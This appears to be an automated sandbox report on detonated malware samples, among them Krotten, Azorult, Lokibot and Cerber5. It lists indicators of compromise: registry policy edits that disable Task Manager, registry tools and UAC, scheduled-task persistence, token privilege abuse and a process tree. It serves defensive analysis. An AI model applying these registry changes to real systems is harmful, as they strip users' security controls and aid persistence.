description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main Krotten.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" Krotten.exe Key created \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Software\Microsoft\Internet Explorer\Main Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" Krotten.exe -
Modifies Internet Explorer start page 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" Krotten.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000_Classes\Local Settings wini.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000_Classes\Local Settings cmd.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\REGFILE\SHELL\OPEN\COMMAND Krotten.exe Key created \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000_Classes\Local Settings R8.exe Key created \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000_Classes\Local Settings Cerber5.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 7688 NOTEPAD.EXE -
Runs .reg file with regedit 2 IoCs
pid Process 3664 regedit.exe 4264 regedit.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 12600 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1140 schtasks.exe 4352 schtasks.exe 2368 schtasks.exe 1996 schtasks.exe 3512 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2644 msedge.exe 2644 msedge.exe 4780 msedge.exe 4780 msedge.exe 4884 identity_helper.exe 4884 identity_helper.exe 2732 msedge.exe 2732 msedge.exe 2732 msedge.exe 2732 msedge.exe 2432 msedge.exe 2432 msedge.exe 236 Azorult.exe 236 Azorult.exe 236 Azorult.exe 236 Azorult.exe 236 Azorult.exe 236 Azorult.exe 236 Azorult.exe 236 Azorult.exe 236 Azorult.exe 236 Azorult.exe 3896 rutserv.exe 3896 rutserv.exe 3896 rutserv.exe 3896 rutserv.exe 3896 rutserv.exe 3896 rutserv.exe 4408 rutserv.exe 4408 rutserv.exe 988 Lokibot.exe 3180 rutserv.exe 3180 rutserv.exe 1988 rutserv.exe 1988 rutserv.exe 1988 rutserv.exe 1988 rutserv.exe 1988 rutserv.exe 1988 rutserv.exe 4716 rfusclient.exe 4716 rfusclient.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe 1152 winit.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3892 taskhostw.exe -
Suspicious behavior: LoadsDriver 35 IoCs
pid Process 668 Process not Found 668 Process not Found 668 Process not Found 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe 5184 mssql.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
pid Process 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 4408 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2132 7zG.exe Token: 35 2132 7zG.exe Token: SeSecurityPrivilege 2132 7zG.exe Token: SeSecurityPrivilege 2132 7zG.exe Token: SeDebugPrivilege 3896 rutserv.exe Token: SeDebugPrivilege 988 Lokibot.exe Token: SeDebugPrivilege 3180 rutserv.exe Token: SeTakeOwnershipPrivilege 1988 rutserv.exe Token: SeTcbPrivilege 1988 rutserv.exe Token: SeTcbPrivilege 1988 rutserv.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 4996 taskkill.exe Token: SeDebugPrivilege 220 powershell.exe Token: SeDebugPrivilege 1920 taskkill.exe Token: SeAuditPrivilege 1156 svchost.exe Token: SeDebugPrivilege 2684 RDPWInst.exe Token: SeAuditPrivilege 920 svchost.exe Token: SeDebugPrivilege 3528 taskkill.exe Token: SeDebugPrivilege 3748 taskkill.exe Token: SeDebugPrivilege 3616 Lokibot.exe Token: SeDebugPrivilege 568 RevengeRAT.exe Token: SeDebugPrivilege 4696 RegSvcs.exe Token: SeSystemtimePrivilege 2984 Krotten.exe Token: SeDebugPrivilege 4324 svchost.exe Token: SeDebugPrivilege 1792 RegSvcs.exe Token: SeDebugPrivilege 4656 Fantom.exe Token: SeDebugPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeLoadDriverPrivilege 5184 mssql.exe Token: SeDebugPrivilege 5272 mssql2.exe Token: SeIncreaseQuotaPrivilege 6072 WMIC.exe Token: SeSecurityPrivilege 6072 WMIC.exe Token: SeTakeOwnershipPrivilege 6072 WMIC.exe Token: SeLoadDriverPrivilege 6072 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 4780 msedge.exe 5488 SearchHost.exe -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 236 Azorult.exe 4012 wini.exe 1152 winit.exe 3896 rutserv.exe 4408 rutserv.exe 3180 rutserv.exe 4112 cheat.exe 1988 rutserv.exe 1372 ink.exe 1260 taskhost.exe 2896 P.exe 1672 R8.exe 3892 winlogon.exe 3892 taskhostw.exe 1996 winlogon.exe 3664 AgentTesla.exe 5184 mssql.exe 5272 mssql2.exe 5488 SearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4780 wrote to memory of 4304 4780 msedge.exe 84 PID 4780 wrote to memory of 4304 4780 msedge.exe 84 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 4756 4780 msedge.exe 85 PID 4780 wrote to memory of 2644 4780 msedge.exe 86 PID 4780 wrote to memory of 2644 4780 msedge.exe 86 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 PID 4780 wrote to memory of 3620 4780 msedge.exe 87 -
System policy modification 1 TTPs 40 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood = "1" Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoThemesTab = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinters = "1" Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103} = "1" Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "1044" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs = "1" Krotten.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 7 IoCs
pid Process 420 attrib.exe 444 attrib.exe 60 attrib.exe 3408 attrib.exe 5144 attrib.exe 1592 attrib.exe 1316 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Lokibot.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Lokibot.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Da2dalus/The-MALWARE-Repo1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ff9d20346f8,0x7ff9d2034708,0x7ff9d20347182⤵PID:4304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2272 /prefetch:22⤵PID:4756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:82⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:12⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:12⤵PID:4568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:82⤵PID:3260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:12⤵PID:2904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:12⤵PID:3424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:12⤵PID:3040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:12⤵PID:3360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2128 /prefetch:82⤵PID:1656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:12⤵PID:2924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:12⤵PID:2944
-
-
